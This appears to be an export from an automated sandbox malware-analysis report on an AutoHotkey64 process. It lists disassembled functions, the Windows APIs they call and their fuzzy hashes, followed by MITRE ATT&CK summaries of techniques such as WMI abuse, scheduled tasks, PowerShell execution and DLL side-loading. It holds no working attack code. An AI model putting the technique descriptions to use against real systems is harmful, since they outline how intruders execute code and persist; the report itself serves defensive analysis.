Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: File$CreateHandleType
String ID:
API String ID: 1789326604-0
Opcode ID: bc53b0564266292ef63d22a76f1a9b830115772919ff060edd6ccfa8c7197b33
Instruction ID: e53d53f9697a9fcc4ea54a8b4c6f9f4c0184f43b4e2654a2aec347eff4c95a88
Opcode Fuzzy Hash: bc53b0564266292ef63d22a76f1a9b830115772919ff060edd6ccfa8c7197b33
Instruction Fuzzy Hash: A941C332A18E4182EB768F66E000B6E63B1F349BE0F545214FB6953BE4DB78C9918B01

Function 00000001400B6B50 Relevance: 3.1, APIs: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,000000014002A868,?,?), ref: 00000001400B6B86
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,000000014002A868,?,?), ref: 00000001400B6C3B

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 7997eb7406547a358e04caacded2c25118e1a8eb98481e8a662851c099eeacd8
Instruction ID: be9811cb36ec65b8eaaeabc198f6461a6dd23043523d4fa04f455f045783ebd1
Opcode Fuzzy Hash: 7997eb7406547a358e04caacded2c25118e1a8eb98481e8a662851c099eeacd8
Instruction Fuzzy Hash: C1418D72A01B5485EB6ACFB7E4543A97BB1E399B94F488119EB85077F8CB38C841C741

Function 0000000140063A99 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0000000140063AF1
DefWindowProcW.USER32 ref: 0000000140063D9E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: MessagePostProcWindow
String ID:
API String ID: 1517762806-0
Opcode ID: ce40794c9c34771f848aaa1af4f7308e092fec3bfe0d5c3d6eb3e9190edad66a
Instruction ID: 4ebe549dae7fd8214a308bf2a70c2d08f6b004c2e098ab875a9843d76bac2c43
Opcode Fuzzy Hash: ce40794c9c34771f848aaa1af4f7308e092fec3bfe0d5c3d6eb3e9190edad66a
Instruction Fuzzy Hash: EA11A13231028080EBB3872BEA157AA12A2AB4CBD4F344C15AB4D577B5C939C8439340

Function 0000000140006180 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400291A0: GetSystemMetrics.USER32 ref: 0000000140029238
Part of subcall function 00000001400291A0: LoadCursorW.USER32 ref: 000000014002927A
Part of subcall function 00000001400291A0: RegisterClassExW.USER32 ref: 00000001400292A5
Part of subcall function 00000001400291A0: RegisterClassExW.USER32 ref: 00000001400292CC

SystemParametersInfoW.USER32 ref: 00000001400061AA
SystemParametersInfoW.USER32 ref: 00000001400061CD

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: System$ClassInfoParametersRegister$CursorLoadMetrics
String ID:
API String ID: 3286897122-0
Opcode ID: 2be0fb229912fdc64aadf2225b4e845afbc8d1fe3156e2f8f4488b183df0fac5
Instruction ID: 58a7136ada0a8a59f2e058a1358a1bd5b7d90337e0763ebd1d1e7bd5f8fa6db1
Opcode Fuzzy Hash: 2be0fb229912fdc64aadf2225b4e845afbc8d1fe3156e2f8f4488b183df0fac5
Instruction Fuzzy Hash: 080171B1B01B4181FB2ADB67B8957D56292AB8DB80F8C4029AB49676F2EE3CC4518750

Function 00000001400633AE Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32 ref: 00000001400633C2
DefWindowProcW.USER32 ref: 0000000140063D9E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: FocusProcWindow
String ID:
API String ID: 1691694861-0
Opcode ID: cab41a5322253c51414a50c42dd1bca7e75861c6a3667fd5454b39479c2bdf6a
Instruction ID: 6d7ae4ae7dd3acb5486a78528052f76f264bf2ca68a1e3e297bfb94fa998e47e
Opcode Fuzzy Hash: cab41a5322253c51414a50c42dd1bca7e75861c6a3667fd5454b39479c2bdf6a
Instruction Fuzzy Hash: 78E01A326009C081E663D713FE047A66361BB8CBE8F5448029E5D67778DE3CC887C700

Function 00000001400BE450 Relevance: 2.6, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00000001400BE491
MultiByteToWideChar.KERNEL32 ref: 00000001400BE4E1

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: e29e01234b5fd9237f9f2473fcfc1188340dcf54c5f43f5ba10929ed94b9ac54
Instruction ID: e72e3b927bf2db8d4a4956b52630169e62d98c14b6966c47981c41576fcd96d5
Opcode Fuzzy Hash: e29e01234b5fd9237f9f2473fcfc1188340dcf54c5f43f5ba10929ed94b9ac54
Instruction Fuzzy Hash: D6215B31704BC185E761DF63B80039BB6A5B79CBC8F448129BF8997BBAEA38C5518740

Function 0000000140005950 Relevance: 2.5, APIs: 2, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00000001400059B0
free.LIBCMT ref: 00000001400059D1

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CloseHandlefree
String ID:
API String ID: 3486141430-0
Opcode ID: f74670a77459853630ce8ce1bee7117459306e58469b671b3ccd67d17ea94520
Instruction ID: 41aa46279b5084e17c454be56ec1d510c9ef6856ee847339234b28a2cd09979c
Opcode Fuzzy Hash: f74670a77459853630ce8ce1bee7117459306e58469b671b3ccd67d17ea94520
Instruction Fuzzy Hash: E7115B32201A40C5EB62DF2AF450399B364EB89BF4F544319EBB9476F8DB79C482CB00

Function 00000001400497C0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140040110: GlobalUnlock.KERNEL32 ref: 00000001400401DA
Part of subcall function 0000000140040110: CloseClipboard.USER32 ref: 00000001400401E7
Part of subcall function 0000000140040110: GetTickCount.KERNEL32 ref: 00000001400401FA
Part of subcall function 0000000140040110: PeekMessageW.USER32 ref: 000000014004022E
Part of subcall function 0000000140040110: GetTickCount.KERNEL32 ref: 0000000140040242

GetTickCount.KERNEL32 ref: 00000001400498CD

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c83fa38998180b6b1780edfe557966e48c184ea4dffe7d8bfc57042bff9d1fa3
Instruction ID: f4ff72b9780de7287aa2f7d7b2be3d701968c513ecee93f220d07850b302ae42
Opcode Fuzzy Hash: c83fa38998180b6b1780edfe557966e48c184ea4dffe7d8bfc57042bff9d1fa3
Instruction Fuzzy Hash: 28415071608A4481EB67CB17A8407E967A1F38DBE4F15423AEFA9537F5DB38C4418704

Function 0000000140005A20 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE ref: 0000000140005A30

Part of subcall function 0000000140071040: GetCurrentDirectoryW.KERNEL32(?,0000000140005A3D), ref: 000000014007105C

Part of subcall function 0000000140005FD0: FindWindowW.USER32 ref: 000000014000605C

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CurrentDirectoryErrorFindModeWindow
String ID:
API String ID: 2401824476-0
Opcode ID: 9ebb8d56d1d57c3454d05503c4e8a2a78ca7efdc81043c1b620237a921b84c8d
Instruction ID: 7b715193377d1a036083d4560c8bf0263577b8fa676fe52b6fc20cc017f68c7d
Opcode Fuzzy Hash: 9ebb8d56d1d57c3454d05503c4e8a2a78ca7efdc81043c1b620237a921b84c8d
Instruction Fuzzy Hash: 65418FB0701A0581FF57E727F8A53E62291AB8DBD5F940129EB0A932F2EF7CC9458351

Function 00000001400B1260 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

realloc.LIBCMT ref: 00000001400B12CD

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: b513740523cd09518267bafcb3559e74380187ce6984c64673528f04570a3d40
Instruction ID: 5cd292b6f9c85ed3e42b3072f7468118ca55e907e2c36d27ceb86ca71a6a598d
Opcode Fuzzy Hash: b513740523cd09518267bafcb3559e74380187ce6984c64673528f04570a3d40
Instruction Fuzzy Hash: 78310272600A9482DA52CF87A484BE963B8FB9CFC4F890421EF1D43B69DB34C192C340

Function 00000001400B0FD0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

realloc.LIBCMT ref: 00000001400B1011

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e9b4ac36e917b7d879bf168b0bc81bce3db70570fc40b4377c7d47738e0e43b2
Instruction ID: 5cedece5d6ff330568f211bb572b3097e87c7e7e806fc9ccdf10424e3b02583f
Opcode Fuzzy Hash: e9b4ac36e917b7d879bf168b0bc81bce3db70570fc40b4377c7d47738e0e43b2
Instruction Fuzzy Hash: 76314472221F8086DA219F62E44039A63B4F75CBD4F985626EF9D53BA8EF38C591C340

Function 00000001400B6CD0 Relevance: 1.5, APIs: 1, Instructions: 289COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00000001400B6F76

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 23ff4258d3bea678e0e240e4911b0abddc230467f1d73850548a1d8efe7cf52c
Instruction ID: cba92ac32ddad1a3b3feb83d02f3469b55ee6b6bd685e44c1f317069469b46f8
Opcode Fuzzy Hash: 23ff4258d3bea678e0e240e4911b0abddc230467f1d73850548a1d8efe7cf52c
Instruction Fuzzy Hash: A4B10572624A908AEB729FA7D0407ED23B1F7587D8F509126FB4A47BE4DB79C981C700

Function 000000014006337B Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000140063D9E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: e8e9d8796f30a347e983fed88a65c25d59728602086e9dd0fa0779f322678dd8
Instruction ID: 6d985a48305c8ddd6ebe3579f3977428c258b7ce9c26118ab8bdfc0082b8d724
Opcode Fuzzy Hash: e8e9d8796f30a347e983fed88a65c25d59728602086e9dd0fa0779f322678dd8
Instruction Fuzzy Hash: 55F08C362145C081E7A3D323BE007E66361BB8DBE8F540D069F2D63AB9DA38C487C300

Function 00000001400B76D0 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00000001400B76E8

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 607ff40cb4d12084776d1ab5d6b1b63de3b6ac8930c377e61ac8f17122d0ccbe
Instruction ID: 39a6691a79898ced3f6f2198a6560b6b45d0cf03b1945331eabf87b007987bc6
Opcode Fuzzy Hash: 607ff40cb4d12084776d1ab5d6b1b63de3b6ac8930c377e61ac8f17122d0ccbe
Instruction Fuzzy Hash: 7FD0C936A04A80C7C710DF28E40428AB7B0F78A748FA00112FB8D87728EB3AC916CF40

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

